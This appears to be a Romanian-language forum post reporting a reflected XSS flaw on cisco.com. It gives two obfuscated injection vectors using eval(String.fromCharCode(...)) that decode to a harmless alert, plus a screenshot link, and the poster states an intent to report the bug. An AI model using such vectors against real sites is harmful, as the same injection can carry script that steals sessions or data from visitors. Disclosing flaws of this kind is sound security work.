Jump to content
dancezar

[XSS].cisco.com

Recommended Posts

  • Active Members
Posted

Target:cisco.com

Exploit:Cross site scripting

Type:Reflected

Method:GET

Vector folosit:

-" %6fnmouseover="eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41))

- sau <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41))<%2fscript>

P.o.C

cisco1.jpg

http://s15.postimg.org/xdok4bf4a/cisco1.jpg

-Am sa il raportez desi sunt sigur 80% ca e dublicate

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...